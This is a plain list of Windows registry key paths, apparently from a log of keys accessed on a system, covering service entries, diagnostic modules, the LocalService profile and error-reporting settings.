HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\WOW64
HKEY_USERS\S-1-5-19
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19\ProfileImagePath
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\S-1-5-19\Environment
HKEY_USERS\S-1-5-19\Volatile Environment
HKEY_USERS\S-1-5-19\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Environment
HKEY_CURRENT_USER\Software\Classes\AppID\taskhost.exe
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WDI\DiagnosticModules
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NameResource
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WDI\Config
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\Config\ServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\CLResolutionInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\DisplayInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\SkipWatson
HKEY_LOCAL_MACHINE\Software\Microsoft\RADAR\HeapLeakDetection\Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\Settings\ReflectionInterval
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation
